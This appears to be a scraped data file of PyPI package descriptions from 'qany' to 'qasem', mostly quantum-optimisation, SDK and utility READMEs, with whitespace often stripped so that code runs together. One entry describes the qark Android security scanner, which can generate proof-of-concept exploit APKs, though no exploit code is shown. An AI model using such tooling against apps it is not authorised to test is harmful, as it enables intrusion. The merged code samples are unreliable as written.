command fromSo , whyqany/__main__.pydoes not work?because top-level package is qany now.loggingAlways use logging for log print,dont useprintlogging config is controlled bylogging.yml, which can control every module level callsetup_logging` in main file (ra)make moduleupdate readmeput moudle in the folder parallel with logx folder.logxyour_modulepacking module or cmdlocalfor quick test purposeinstall:pip install .uninstall:pip uninstall make install\nmake uninstallupload to test or prod PYPI serverupload to test server:make upload-to-testupload to prod server:make upload-to-prodtest and coveragepure testmake testtest with coveragemake coverage"} +{"package": "qaoa", "pacakge-description": "QAOAThis package is a flexible python implementation of theQuantum Approximate Optimization Algorithm/Quantum Alternating Operator ansatz(QAOA)aimed at researchersto readily test the performance of a new ansatz, a new classical optimizers, etc. By default it uses qiskit as a backend.Install withpip install qaoaorpip install -e ..BackgroundGiven acost function$$c: \\lbrace 0, 1\\rbrace^n \\rightarrow \\mathbb{R}$$\none defines aproblem Hamiltonian$H_P$ through the action on computational basis states via$$ H_P |x\\rangle = c(x) |x\\rangle,$$which means that ground states minimize the cost function $c$.\nGiven a parametrized ansatz $ | \\gamma, \\beta \\rangle$, a classical optimizer is used to minimize the energy$$ \\langle \\gamma, \\beta | H_P | \\gamma, \\beta \\rangle.$$QAOA of depth $p$ consist of the followingansatz:$$ |\\gamma, \\beta \\rangle = \\prod_{l=1}^p \\left( U_M(\\beta_l) U_P(\\gamma_l)\\right) | s\\rangle, $$where$U_P$ is a family ofphase-separating operators,$U_M$ is a family ofmixingoperators, and$|s\\rangle$ is a \"simple\"initialstate.In plain vanilla QAOA these have the form\n$U_M(\\beta_l)=e^{-i\\beta_l X^{\\otimes n}}$, $U_P(\\gamma_l)=e^{-i\\gamma_l H_P}$, and the uniform superposition $| s \\rangle = |+\\rangle^{\\otimes n}$ as initial state.Create a custom ansatzIn order to create a custom QAOA ansatz, one needs to specify aproblem, amixer, and aninitial state. These base classes have an abstract methoddef create_circuit:which needs to be implemented. The problem base class additionally has an abstract methoddef cost:.This library already contains several standard implementations.The followingproblemcases are already available:MaxCutQUBOExact coverPortfolioThe followingmixercases are already available:X-mixerXY-mixerGrover-mixerThe followinginitial statecases are already available:PlusStatevectorDickeIt isvery easy to extend this listby providing an implementation of a circuit/cost of the base classes mentioned above. Feel free to fork the repo and create a pull request :-)To make an ansatz for the MaxCut problem, the X-mixer and the initial state $|+\\rangle^{\\otimes n}$ one can create an instance like this:qaoa = QAOA(\n\tinitialstate=initialstates.Plus(),\n\tproblem=problems.MaxCut(G=\"some networkx instance\"),\n\tmixer=mixers.X()\n)Run optimization at depth $p$For depth $p=1$ the expectation value can be sampled on an $n\\times m$ Cartesian grid over the domain $[0,\\gamma_\\text{max}]\\times[0,\\beta_\\text{max}]$ with:qaoa.sample_cost_landscape()Sampling high-dimensional target functions quickly becomes intractable for depth $p>1$. We thereforeiteratively increase the depth. At each depth alocal optimizationalgorithm, e.g. COBYLA, is used to find a local minimum. Asinitial guessthe following is used:At depth $p=1$ initial parameters $(\\gamma, \\beta)$ are given by the lowest value of the sampled cost landscape.At depth $p>1$ initial parameters $(\\gamma, \\beta)$ are based on aninterpolation-based heuristicof the optimal values at the previous depth.Running this iterative local optimization to depth $p$ can be done by the following call:qaoa.optimize(depth=p)The function will callsample_cost_landscapeif not already done, before iteratively increasing the depth.Further parametersQAOA supports the following keywords:qaoa = QAOA( ...,\n\tbackend= ,\n\tnoisemodel= ,\n\toptimizer= ,\n\tprecision= ,\n\tshots= ,\n\talpha=\n)backend: the backend to be used, defaults toAer.get_backend(\"qasm_simulator\")noisemodel: the noise model to be used, default toNone,optimizer: a list of the optimizer to be used from qiskit-algorithms together with options, defaults to[COBYLA, {}],precision: sampel until a certain precision of the expectation value is reached based on $\\text{error}=\\frac{\\text{variance}}{\\sqrt{\\text{shots}}}$, defaults toNone,shots: number of shots to be used, defaults to1024,alpha: the value forconditional value at risk (CVAR), defaults to1, which are the standard moments.Extract resultsOnceqaoa.optimize(depth=p)is run, one can extract, the expectation value, variance, and parametres for each depth $1\\leq i \\leq p$ by respectively calling:qaoa.get_Exp(depth=i)\nqaoa.get_Var(depth=i)\nqaoa.get_gamma(depth=i)\nqaoa.get_beta(depth=i)Additionally, for each depth every time the loss function is called, theangles, expectation value, variance, maximum cost, minimum cost,andnumber of shotsare stored inqaoa.optimization_results[i]Example usageSeeexamples here."} +{"package": "qaoalib", "pacakge-description": "qaoalibA package for QAOA Max-cut Calculations.Packages required:numpynetworkxmatplotlibqiskitHow to installYou can install from the PyPI:pip install --upgrade qaoalibUsageCalculate Max-cut expectation withQmcorQmcFastKron(faster version):import networkx as nx\nfrom qaoalib.qaoa import Qmc, QmcFastKron\n\nG = nx.fast_gnp_random_graph(10, 0.5) # Random graph with 10 nodes\nparams = [0.2, 0.4, 0.3, 0.5] # 4 params, depth = 2\n\nqmc = Qmc(G, params) # or QmcFastKron(G, params)\nqmc.run()\nprint(qmc.expectation)Plot landscapes of the QAOA Max-cut expectation function:import networkx as nx\nfrom qaoalib.qaoa.landscape import HybridFast\n\nG = nx.fast_gnp_random_graph(10, 0.5)\nprev_params = [0.1, 0.2] # previous parameters (gamma1, beta1)\n\nins = HybridFast(G, prev_params) # plots the landscape wrt gamma2 and beta2 with previous parameters given.\nins.create_grid()\nins.show_landscape()"} +{"package": "qaoa-quimb", "pacakge-description": "QAOA-QUIMBThis librairy implements an optimized version of the Quantum Approximate Optimization Algorithm (QAOA) and various extensions with Quimb.InstallationTo install with pip:pip install qaoa_quimbReferencesGray, J. (2018). quimb: a python library for quantum information and many-body calculations. Journal of Open Source Software, 3(29), 819. doi:10.21105/joss.00819."} +{"package": "qaoverpapers", "pacakge-description": "No description available on PyPI."} +{"package": "qap", "pacakge-description": "UNKNOWN"} +{"package": "qapGA", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qapGAr", "pacakge-description": "This is a genetic algorithm library for quadratic assignment problem.Change Log0.0.1 (2022.05.15)"} +{"package": "qapi", "pacakge-description": "QAPIA API query language."} +{"package": "qapi-sdk", "pacakge-description": "QAPI SDKQAPI SDK provides a library of classes for working with Query API in your Python code.RequirementsPython 3.6+Must be logged into the private VPN.Installationpipinstallqapi-sdkEnvironment VariablesQAPI_URL: QAPI Base URL.EMAIL: Your EmailOptional: If you choose to add your AWS credentials, you can use theread_columnsmethod to read in the\nheaders of your CSV file automatically.AWS_ACCESS_KEY_ID: AWS Access Key IDAWS_SECRET_ACCESS_KEY: AWS Secret Access KeyAWS_DEFAULT_REGION: AWS Default RegionExamplesQueryFEED ID: The table must exist in Athena.QUERY ID: The query id is used as an identifier for the query. Query id must be unique. Once you have retrieved your\ndata from S3 it is advised to delete the query.SQL: The SQL query to be executed.importtimefromdotenvimportload_dotenvfromqapi_sdkimportQueryload_dotenv()# Step 1: Assign your FEED ID, QUERY ID, and SQL QUERYfeed_id=\"[FEED/TABLE NAME]\"query_id=\"[QUERY NAME]\"query=f\"SELECT * FROM{feed_id}\"# Step 2: Create a Query objectmy_query=Query(feed_id=feed_id,query_id=query_id)# Step 3: Execute the query pushmy_query.push_query(sql=query)# Step 4: Wait for the query to completewhilemy_query.query_status():print(\"Waiting for query to complete...\")time.sleep(10)# Step 5 (Optional): Delete the querymy_query.delete_query()FeedFEED ID: The table name you want to create in Athena.PUSH ID: The push id is used as an identifier for the query. Push id must be unique.COLUMNS: The name of the columns that will be pushed to Athena.importtimefromdotenvimportload_dotenvfromqapi_sdkimportFeedload_dotenv()# Step 1: Assign your FEED ID, PUSH ID, and COLUMNSfeed_id=\"[FEED/TABLE NAME]\"push_id=\"[PUSH ID/PUSH NAME]\"# Step 2: Create a Feed objectmy_feed=Feed(feed_id=feed_id,push_id=push_id)# Step 3: You can manually assign the columnscolumns=[{\"name\":\"email\",\"type\":\"string\"},{\"name\":\"md5email\",\"type\":\"string\"},{\"name\":\"firstname\",\"type\":\"string\"}]# Step 3a (Optional): If you added AWS credentials, you can use the `read_columns` method to read# in the headers of your CSV file automatically.columns=my_feed.read_columns(data_bucket=\"[DATA BUCKET]\",data_key=\"path/to/your/data/dir/ OR path/to/your/data/file.csv\",delimiter=\",\")# Step 4: Define where to grab the data and format of the data.Then push the data to Athena.my_feed.push_feed(pull_path_bucket=\"[DATA BUCKET]\",pull_path_key=\"path/to/your/data/dir OR path/to/your/data/file.csv\",columns=columns,separator=\",\")# Step 5: Wait for the push to completewhilemy_feed.push_status():print(\"Waiting for push to complete...\")time.sleep(10)# Step 6 (Optional): Delete the pushmy_feed.delete_push()# Step 7 (Optional): Delete the feedmy_feed.delete_feed()RedshiftFEED ID: You must use an existing feed.QUERY ID: The query id is used as an identifier for the query. Query id must be unique. Once you have retrieved your\ndata from S3 it is advised to delete the query.SQL: The SQL query to be executed.If you query an Athena table from Redshift, you must append the Athena schema to the table name.For example:SELECT * FROM [query_api].[TABLE NAME]If you use aLIMITclause, you must wrap the query in aSELECT * FROM ()clause.For example:SELECT * FROM (SELECT * FROM [TABLE NAME] LIMIT 100)importtimefromdotenvimportload_dotenvfromqapi_sdkimportRedshiftload_dotenv()# Step 1: Assign your FEED ID, QUERY ID, and SQL QUERYfeed_id=\"[EXISTING FEED ID]\"query_id=\"[QUERY NAME]\"query=\"SELECT * FROM (SELECT * FROM [SCHEMA].[TABLE NAME] LIMIT 10)\"# Step 2: Create a Redshift objectmy_query=Redshift(feed_id=feed_id,query_id=query_id)# Step 3: Execute the query pushmy_query.push_query(sql=query)# Step 4: Wait for the query to completewhilemy_query.query_status():print(\"Waiting for query to complete...\")time.sleep(10)# Step 5 (Optional): Delete the querymy_query.delete_query()CHANGELOG[0.3.4] - 2020-06-02UpdatedREADME.mdto inform the user they can push a directory of files with thepush_feedmethod or push a single\nfile with thepush_feedmethod.UpdatedREADME.mdto inform the user they can use theread_columnsmethod to read in the headers of your CSV\nfile from a directory or a single file automatically.Changed theread_columnsparameterdata_key_dirtodata_key. This is to make it consistent with the other\nmethods.Changed the order of operations steps in theREADME.mdfile to make it easier to follow.[0.3.3] - 2020-06-01Updated package to include Python 3.6+[0.3.2] - 2020-05-30UpdatedREADME.md[0.3.0] - 2020-05-30AddedRedshiftobject to the SDK.Addeddelete_querymethod to Redshift class.Addedquery_statusmethod to Redshift class.Addedpush_querymethod to Redshift class.UpdatedREADME.md[0.2.1] - 2020-05-30Addedhomepageandrepositorylinks to thepyproject.tomlfile.[0.2.0] - 2020-05-29AddedFEEDobject to the SDK.Addedread_columnsmethod to Feed class.Addeddelete_pushmethod to Feed class.Addeddelete_feedmethod to Feed class.Addedpush_statusmethod to Feed class.Addedpush_feedmethod to Feed class.UpdatedREADME.md[0.1.4] - 2022-05-29AddedQUERYobject to the SDK.Addeddelete_querymethod to Query class.Addedquery_statusmethod to Query class.Addedpush_querymethod to Query class.Added theCHANGELOGsection.UpdatedREADME.md"} +{"package": "qapla", "pacakge-description": "No description available on PyPI."} +{"package": "qapR", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qapRu", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qapRutaB", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qapy", "pacakge-description": "https://github.com/matt-charr/qa-demo/blob/master/README.md"} +{"package": "qaqa2121q", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qaqc", "pacakge-description": "QaQcProject is WIP.See alsoSaQCwhich gave some major ideas for this project."} +{"package": "qaquora", "pacakge-description": "Quora-ScraperThis package will allow you to scrap all Questions-Answers related to any topic e.g. mathematics-and-physics,coronavirus etc from Quora.It includes two functions for now-quora_scrap(self,keyword,PATH)arguments-keyword- keyword is an argument which describes your topic for e.g coronavirus,coronavirusinindia etc.PATH- to define path of chromedriver.exe filereturn-questions- questions scrapped for keywordanswers- answers scrapped for each questionfinal_qa_dict- dictionary of scrapped questions-answerssave_to_csv(self,filename,questions,final_question_answer_pairs_quora_dict)arguments-filename- specify name of your csv filequestions- questions returned by function 'quora_scrap'final_question_answer_pairs_quora_dict- specifies question-answer dictionary returned by function 'quora_scrap'If anyone wants to contribute in this project,feel free to do."} +{"package": "qarbon", "pacakge-description": "qarbon is a python library for Qt widgets."} +{"package": "qArchSearch", "pacakge-description": "No description available on PyPI."} +{"package": "qarealtime-collector", "pacakge-description": "QARealtimeCollector: QUANTAXIS REALTIME MARKETDATA COLLECTORS"} +{"package": "qarg", "pacakge-description": "quick argument parsingA simple concise way of defining arguments for an argparse.ArgumentParser-- Syntax --comma seperated list of argsargs:({[=@#$all but short name are optionalif long name is missing, short name will be usedif long name is missing, and short name has len > 1long name will be short name and short name will be thefirst character of short nameexamples:f(foo)[int]=10f[int]=10supported add_argument optionsname or flags (short name & long name)action = '@'nargs = '#'const = '$'default = '='type = '['choices = not supportedrequired = '!'help = not supportedmetavar = not supporteddest = '{'-- Example --import qargns = qarg.get('f(foo[int=1,r(bar,baz[str,p(pop@store_true')"} +{"package": "qark", "pacakge-description": "Quick Android Review KitThis tool is designed to look for several security related Android application vulnerabilities, either in source code or packaged APKs. The tool is also capable of creating \u201cProof-of-Concept\u201d deployable APKs and/or ADB commands, capable of exploiting many of the vulnerabilities it finds. There is no need to root the test device, as this tool focuses on vulnerabilities that can be exploited under otherwise secure conditions.RequirementsTested on Python 2.7.13 and 3.6\nTested on OSX, Linux, and WindowsUsageFor more options please see the--helpcommand.APK:~ qark --apk path/to/my.apkJava source code files:~ qark --java path/to/parent/java/folder\n~ qark --java path/to/specific/java/file.javaResultsA report is generated in JSON and can be built into other format types, to change the report type please use the--report-typeflag.InstallationWith pip (no security checks on requirements):~ pip install --user qark # --user is only needed if not using a virtualenv\n~ qark --helpWithrequirements.txt(security checks on requirements):~ git clone https://github.com/linkedin/qark\n~ cd qark\n~ pip install -r requirements.txt\n~ pip install . --user # --user is only needed if not using a virtualenv\n~ qark --helpExploit APKQARK can generate a basic exploit APK for a few of the vulnerabilities that have been found.To generate the exploit APK there are a few steps to follow. You need to have the Android SDK v21 and build-tools v21.1.2Install the android SDK, you can get it under the \u2018command line tools\u2019:https://developer.android.com/studio/#downloadsUnzip the android SDKGo into the new directory and generate the licenses withbin/sdkmanager \u2013licensesMake sure the generated licenses are in the android SDK directory.Install the SDK and the proper build-tools version:bin/sdkmanager \u2013install \u201cplatforms;android-21\u201d \u201csources;android-21\u201d \u201cbuild-tools;21.1.2\u201dChecksQARK is an easy to use tool capable of finding common security vulnerabilities in Android applications. Unlike commercial products, it is 100% free to use. QARK features educational information allowing security reviewers to locate precise, in-depth explanations of the vulnerabilities. QARK automates the use of multiple decompilers, leveraging their combined outputs, to produce superior results, when decompiling APKs. Finally, the major advantage QARK has over traditional tools, that just point you to possible vulnerabilities, is that it can produce ADB commands, or even fully functional APKs, that turn hypothetical vulnerabilities into working \u201cPOC\u201d exploits.Included in the types of security vulnerabilities this tool attempts to find are:Inadvertently exported componentsImproperly protected exported componentsIntents which are vulnerable to interception or eavesdroppingImproper x.509 certificate validationCreation of world-readable or world-writeable filesActivities which may leak dataThe use of Sticky IntentsInsecurely created Pending IntentsSending of insecure Broadcast IntentsPrivate keys embedded in the sourceWeak or improper cryptography usePotentially exploitable WebView configurationsExported Preference ActivitiesTapjackingApps which enable backupsApps which are debuggableApps supporting outdated API versions, with known vulnerabilitiesNoticeNote: QARK decompiles Android applications back to raw source code. Please do not use this tool if this may be considered illegal in your juristdiction. If you are unsure, seek legal counsel.If you run into issues on OSX, especially relating to the outbound call to the Play Store, or the downloading of the SDK, it is\nlikely due to your Python/OpenSSL configuration and the fact that recent changes in OSX impacted Python installed via brew. Nuking your\nPython installation(s) and re-installing from source may fix your issues.LicenseCopyright 2015 LinkedIn Corp. All rights reserved.Copyright 2015 LinkedIn Corp. Licensed under the Apache License, Version 2.0 (the \u201cLicense\u201d); you may not use this file except in compliance with the License.You may obtain a copy of the Licensehere.\nUnless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \u201cAS IS\u201d BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied."} +{"package": "qarl", "pacakge-description": "QARLQemu Automation that is Really Light-weight."} +{"package": "qarnot", "pacakge-description": "Qarnot computing Python SDKThis package allows you to use Qarnot cloud computing service.You can launch, manage and monitor payloads running on distributed computing nodes deployed in Qarnot\u2019sdigital boilers.Basic usageCreate an account, retrieve your token and get free computation time onaccount.qarnot.comLaunch a docker container in 7 lines:importqarnotconn=qarnot.connection.Connection(client_token=\"xxxx_mytoken_xxxx\")task=conn.create_task('hello world','docker-batch',4)task.constants['DOCKER_CMD']='echo hello world from node #${FRAME_ID}!'task.run()print(task.stdout())Samples and documentationsYou can find samples and detailed information onqarnot.com.SDK documentation is availablehereGenerating documentationTo generate the SDK documentation you can use the following commandmake-CdochtmlThe index of the doc is then generated indoc/_build/html/index.html"} +{"package": "qarray", "pacakge-description": "No description available on PyPI."} +{"package": "qarrayrun", "pacakge-description": "A helper tool for running array jobs on an HPC computational node.The qarrayrun package was developed by the United States Food\nand Drug Administration, Center for Food Safety and Applied Nutrition.This script executes a single slot of an array job on an HPC compute node.\nIt is intended to be used with Sun Grid Engine, SLURM, or Torque job schedulers.\nIt assumes every instance of the job array runs the same command but with\ndifferent arguments. This script performs the work of looking-up the\narguments in a text file and substituting those arguments into the command\nto be executed.Free softwareDocumentation:https://qarrayrun.readthedocs.ioSource Code:https://github.com/CFSAN-Biostatistics/qarrayrunPyPI Distribution:https://pypi.python.org/pypi/qarrayrunFeaturesExecutes a single slot of an array job on an HPC compute nodeSimple parameter lookup languageSupports execution in a subshell when neededCiting qarrayrunTo cite qarrayrun, please reference the qarrayrun GitHub repository:https://github.com/CFSAN-Biostatistics/qarrayrunLicenseSee the LICENSE file included in the qarrayrun distribution.History1.1.0 (2020-04-28)Update command line help to mention SLURM support.1.0.1 (2018-12-11)Fix the text in usage example.1.0.0 (2018-11-29)First public release."} +{"package": "qarray-rust-core", "pacakge-description": "qarray-rust-coreQuantum Dot Constant Capacitance Simulatoris a high-performance Python package that leverages the power of Rust and Rayon to provide a fully parallelised and optimised simulation environment for quantum dots with constant capacitance.This package provides core functionality; it is not intended that the user will interact with it directly.FeaturesUltra-fast Simulation:Harnesses the speed of Rust and the parallelism of Rayon to deliver lightning-fast simulations.Constant Capacitance:Specialized for simulating quantum dots with constant capacitance, allowing precise modelling of charge dynamics.User-Friendly:Designed with ease of use in mind, making it accessible to both experts and newcomers in quantum dot simulations.Extensive Documentation:Comprehensive documentation and examples to help you get started quickly.InstallationInstall Quantum Dot Constant Capacitance Simulator using pip:pipinstallqarray-rust-coreUsageThis package exposes two functions to be called from python:ground_state_open- computes the lowest energy state of a quantum dot array with constant capacitance and which is open, such that the total number of changes is not fixed.ground_state_closed- computes the lowest energy state of a quantum dot array with constant capacitance and which is closed, such that the total number of changes is fixed.The python code to call these functions is as follows:fromqarray-rust-coreimport(ground_state_open,ground_state_closed)importnumpyasnp# the dot-dot capacitance matrixcdd=np.array([[1,-0.1],[-0.1,1]])cdd_inv=np.linalg.inv(cdd)# the dot-gate capacitance matrixcgd=np.array([[1,0.3],[0.3,1]])# define a matrix of gate voltages to sweep over the first gatevg=np.stack([np.linspace(-1,1,100),np.zeros(100)],axis=-1)n_charge=3# the number of changes to confine in the quantum dot array for the closed casethreshold=1# threshold to avoid having to consider all possible charge states, setting it 1 is always correct, however has a computatinal cost.n_open=ground_state_open(vg,cgd,cdd_inv,threshold)n_closed=ground_state_closed(vg,n_charge,cgd,cdd,cdd_inv,threshold)It is not intended the user ever call these functions directly.There is a pure Python wrapper that provides a more user-friendly interface to this core functionality.\nSeeQuantum Dot Constant Capacitance Simulator. This package provides:A user-friendly interfaceto the core functionality.Plotting, charge sensing, virtual gateand gate voltage sweeping (1d and 2d) functionality.Advanced type checkingusing pydantic.Automated testingincluding for the functionality in this package.More examples."} +{"package": "qary", "pacakge-description": "qaryTheqarypackage is both a chatbot framework and a virtual assistant that actually assists!\nMost bots manipulate you to make money for their corporate masters. With qary, you can buildyourbot to protect you and amplify your prosocial intelligence.We started work onqaryas part of 1st editition ofNLP in Action.\nIt has slowly grown into the core framework for a social-impact startupTangible AI.\nTangible AIinterns and volunteersare constantly fixing bugs, adding new features and dialog trees to qary's repetoire.\nTheSan Diego Python User Groupmeetups have been the scene forsome fun qary demos.\nTheSan Diego Machine Learning Book Clubis a great place for support on advanced concepts in theNLP in Actionbook or anything NLP and machine learning related.\nYou can find more ideas indocs/.InstallInstall from sourceRetrieve the source code from GitLab using a bash console:gitclonegit@gitlab.com:tangibleai/qarycdqaryIf that doesn't work or you don't know what a bash console is, then you probably want to start with theWindows UsersInstructions here:docs/README-windows-install.mdMake sure you installqaryin avirtual environmentusing the latest version ofpipand the pythonvirtualenvpackage:pipinstall--upgradepipvirtualenv\npython-mvirtualenvvenvsourcevenv/bin/activateNow that you have your environment activated, make sure you are in theqary/repository along side the pyproject.toml file so you can install qary in developer (editable) mode:pipinstall--editable.Now you're ready to runqaryfrom the command line (bash console):qary\"Hi!\"PyPi packageqaryis onPyPibut this install is unlikely to work, unless you've already installed all the dependencies:pipinstallqaryUsage$qary--help\nusage:qary[-h][--version][--nameSTR][-p][-sSTR][-v][-vv][words[words...]]Runningqaryfor just one skill$qary-sqa# ... (logging messages)YOU:WhenwasBarackObamaborn?# ... (logging messages)qary:August4,1961qaryskillsqary's probabilistic conversation manager chooses a reply from the possiblities generated by the different personalities:pattern(skills/pattern.py): example skill using regex patterns to reply to greetings like \"hi\"qa(skills/qa.py): BERT and ALBERT Wikipedia Question Answering (WikiQA reading comprehension tests)faq(skills/faq.py): answers to frequently asked questions using data/faq/*.ymlglossary(skills/glossary.py): definitions from glossary yml files in data/faq/glossary-*.ymleliza(eliza.py): a python port of the ELIZA therapist botConfiguring default personalitiesBy default,qaryruns withqapersonality. Check out the config file inqary.inito change the default skills loaded for your own custom skill in the skills directory.Approachqary's chatbot framework allows you to combine many approaches to give you state-of-the-art capability to answer questions and carry on a conversation:search:chatterbot,willpattern matching and response templates: Alexa,AIMLgenerative deep learning:robot-bernie,movie-botgrounding:snipsIt's all explained in detail atNLP in Action.Presentations for San Diego Python User Group are in [docs/](/docs/2019-08-22--San Diego Python User Group -- How to Build a Chatbot.odp) and on the web athttp://totalgood.org/midata/talksContributing pattern for developersDM @hobs on SD PUG'sdiscord serverif you'd like to join us for weekly collaborative-coding sessions onqaryand other open source projects.Create a forkof themain qary repositoryon Gitlab.Make your changes in a branch named something different frommaster, e.g. create\na new branchmy-pull-request.Create a merge request.Help your fellow contributors out by:Follow thePEP-8 style guide.Try to include a docstring, at least a single line, in any function, method, or classBonus points for adding adoctestas part of your contribution.If you add a new feature, write some quick docs in the README.Add your name and attribution to the AUTHORS file.Know we are grateful for your contribution! You've made the chatbot world a little better!"} +{"package": "qas", "pacakge-description": "Example ProjectA general, concurrent and extensible functional testing framework.Read more.InstallingpipinstallqasUsagegitclonehttps://github.com/hatlonely/qas.gitcdqasqas-tops/example-docs/helloworld"} +{"package": "qasdad", "pacakge-description": "QASDAD, the quick and simple data analysis and documentation program.QASDAD is intended to speed up and simplify the process of analysing the data of\nphysical experiments and documenting it and make that process less error prone.\nYou can find examples that are intended to show the capabilities of QASDAD in the \u201cexamples\u201d directory.\nYou can find a german tutorial in the \u201cgerman tutorial\u201d directory.\nYou can find the documentation in the \u201cdocu\u201d directory.\n\u201cdocu/latex/refman.pdf\u201d is the documentation in pdf-format.\nYou should note that QASDAD is still under development, super buggy and not\nfeature complete, but feel free to contact me for bug reports and feature\nrequests atvolker.weissmann@gmx.de.\nThe public API is not stable\nyet, so feel free to propose API changes.QASDAD is written by Volker Wei\u00dfmann, a German physics student at the University\nof Stuttgart.\nFor licensing issues, bug reports, feature requests etc.\ncontact me atvolker.weissmann@gmx.de.\nThis program is free software (free as in freedom)\nand you can find the full license of this program in LICENSE.TXT\nThe direct dependencies of QASDAD are\n* Python 3 (https://www.python.org, not included, needs to be installed separately)\n* Scipy (https://www.scipy.org, not included, needs to be installed separately)\n* Numpy (http://www.numpy.org, not included, needs to be installed separately)\n* Matplotlib (https://matplotlib.org/, not included, needs to be installed separately)\n* Sympy (https://www.sympy.org, not included, needs to be installed separately)\n* latex2sympy (https://gitlab.com/volkerweissmann/latex2sympy, not included, needs to be installed separately)You can also install QASDAD using python3 -m pip install qasdadpGood Luck.QASDAD, the quick and simple data analysis and documentation program\nCopyright (C) 2018 Volker Wei\u00dfmann . Contact:volker.weissmann@gmx.deThis program is free software: you can redistribute it and/or modify\nit under the terms of the GNU Affero General Public License as\npublished by the Free Software Foundation, either version 3 of the\nLicense, or (at your option) any later version.This program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU Affero General Public License for more details.You should have received a copy of the GNU Affero General Public License\nalong with this program. If not, see ."} +{"package": "qasdadp", "pacakge-description": "QASDAD, the quick and simple data analysis and documentation program.QASDAD is intended to speed up and simplify the process of analysing the data of\nphysical experiments and documenting it and make that process less error prone.\nYou can find examples that are intended to show the capabilities of QASDAD in the \"examples\" directory.\nYou can find a german tutorial in the \"german tutorial\" directory.\nYou can find the documentation in the \"docu\" directory.\n\"docu/latex/refman.pdf\" is the documentation in pdf-format.\nYou should note that QASDAD is still under development, super buggy and not\nfeature complete, but feel free to contact me for bug reports and feature\nrequests atvolker.weissmann@gmx.de.\nThe public API is not stable\nyet, so feel free to propose API changes.QASDAD is written by Volker Wei\u00dfmann, a German physics student at the University\nof Stuttgart.\nFor licensing issues, bug reports, feature requests etc.\ncontact me atvolker.weissmann@gmx.de.\nThis program is free software (free as in freedom)\nand you can find the full license of this program in LICENSE.TXT\nThe direct dependencies of QASDAD arePython 3 (https://www.python.org, not included, needs to be installed separately)Scipy (https://www.scipy.org, not included, needs to be installed separately)Numpy (http://www.numpy.org, not included, needs to be installed separately)Matplotlib (https://matplotlib.org/, not included, needs to be installed separately)Sympy (https://www.sympy.org, not included, needs to be installed separately)latex2sympy (https://gitlab.com/volkerweissmann/latex2sympy, not included, needs to be installed separately)You can also install QASDAD using python3 -m pip install qasdadpGood Luck.QASDAD, the quick and simple data analysis and documentation program\nCopyright (C) 2018 Volker Wei\u00dfmann . Contact:volker.weissmann@gmx.deThis program is free software: you can redistribute it and/or modify\nit under the terms of the GNU Affero General Public License as\npublished by the Free Software Foundation, either version 3 of the\nLicense, or (at your option) any later version.This program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU Affero General Public License for more details.You should have received a copy of the GNU Affero General Public License\nalong with this program. If not, seehttps://www.gnu.org/licenses/."} +{"package": "qaseio", "pacakge-description": "Qase TestOps API Specification."} +{"package": "qasem", "pacakge-description": "QASem - Question-Answer based SemanticsThis repository includes software for parsing natural language sentence with various layers of QA-based semantic annotations.\nWe currently support three layers of semantic annotations - QASRL, QANom, and QADiscourse.\nSee an overview of our approach at our paper onQASem Parsing.QASRL (Question Answer driven Semantic Role Labeling)is a lightweight semantic framework for annotating \"who did what to whom, how, when and where\".\nFor every verb in the sentence, it provides a set of question-answer pairs, where the answer mark a participant of the event denoted by the verb, while the question captures itssemantic role(that is, what is the role of the participant in the event).\"QANom\" stands for \"QASRL for Nominalizations\", which is an adaptation of QASRL to (deverbal) nominalization. See theQANom paperfor details about the task.You can find more information onQASRL's official website, including links to all the papers and datasets and a data browsing utility.\nWe also wrapped the datasets into Huggingface Datasets (QASRL;QANom), which are easier to plug-and-play with (check out ourHF profilefor other related datasets, such as QAMR, QADiscourse, and QA-Align).QADiscourseannotates intra-sentential discourse relations with question-answer pairs. It focus on discourse relations that carry information, rather than specifying structural or pragmatic properties of the realied sentencs. Each question starts with one of 17 crafted question prefixes, roughly mapped into PDTB relation senses.Note: In the future, we will also combine additional layers of QA-based semantic annotations for adjectives and noun modifiers, currently at the stage of ongoing work.DemoCheck out thelive QASem demoon Huggingface.InstallationPre-requisite: Python 3.8 (as of version 0.2.0; before that - Python 3.7)Installation is available via pip:pipinstallqasemInstallation from sourceClone the repo and install usingsetup.py:gitclonehttps://github.com/kleinay/QASem.gitcdQASem\npipinstall-e.Alternatively, If you want to install the dependencies explicitly:pipinstalltransformers==4.15.0spacy>=2.3.7qanompipinstallgit+https://github.com/rubenwol/RoleQGeneration.gitIn addition, you would need to download a spacy model for pre-requisite tokenization & POS-tagging:python-mspacydownloaden_core_web_smUsageTheQASemEndToEndPipelineclass would, by demand, parse sentences with any of the QASem semantic annotation layers --- currenlty including 'qasrl', 'qanom' and 'qadiscourse'.FeaturesRun on GPU:Usedevice=din initialization to put models and tensors on a GPU device, wheredis the CUDA device ID. We currently do not support parallelization on multiple GPUs. Defaults todevice=-1, i.e. CPU.Annotation layers:By default, the pipeline would parse all layers.\nTo specify a subset of desired layers, e.g. QASRL and QADiscourse alone, useannotation_layers=('qasrl', 'qadiscourse')in initialization.QA-SRL contextualization:For the sake of generality, QA-SRL and QANom generate ``abstractive'' questions, that replace arguments with placeholders, e.g. \"Why wassomeoneinterested insomething?\". However, in some use-cases you might want to have a more natural question with contextualized arguments, e.g. \"Why wasthe doctorinterested inLuke 's treatment?\". Utilizing the model fromPyatkin et. al., 2021, one can additionally get contextualized questions for QA-SRL and QANom by settingQASemEndToEndPipeline(contextualize=True)(see example below).QA-SRL Discrete Roles:In QA-SRL, semantic roles are captured in a rich but soft manner within the questions. For some applications, a reduced discrete account of semantic roles may be desired. By default (return_qasrl_discrete_role=Truein initialization), we provide a discrete \"question-role\" label per question in the output, based on a heuristic mapping from the question syntactical structure. For the core arguments, \"R0\" corresponds to asking about the subject position (commonly equivalent to proto-agent semantic roles), \"R1\" to direct object (proto-patient), 